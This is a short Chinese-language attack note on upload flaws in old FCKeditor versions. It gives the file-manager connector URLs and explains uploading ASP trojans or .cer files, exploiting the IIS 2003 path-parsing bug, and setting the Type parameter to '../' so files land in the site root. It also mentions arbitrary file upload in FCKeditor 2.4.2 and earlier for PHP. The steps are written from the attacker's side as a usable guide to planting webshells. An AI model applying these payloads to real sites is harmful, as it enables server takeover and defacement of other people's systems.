1 asp版上传漏洞<--Version 2.2

　　FCKeditor/_samples/default.html 或者

　　fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp就会看到编辑页面，

　　可以自定义文件夹名称上传图片木马，利用2003路径解析漏洞，也可以直接上传ASP木马，后者上传cer文件

　　如果是ASPX的就将/asp/connector.asp后缀改为ASPX

　　Type=Image这个变量是我们自己定义的。比如：

　　fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

　　这时候我们就创建了一个名为user的目录，默认情况下没有任何文件格式上传限制

　　上传后我们的文件就保存在

　　/UserFiles/user下了

　　我们也可以这样

　　fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp

　　这样文件就可以直接传到网站的根目录了

　　2 Fckeditor <=2.4.2 For php 任意上传文件漏洞

　　未对Media类型进行上传文件类型的控制，导致用户上传任意文件 利用方式就不在这里重复了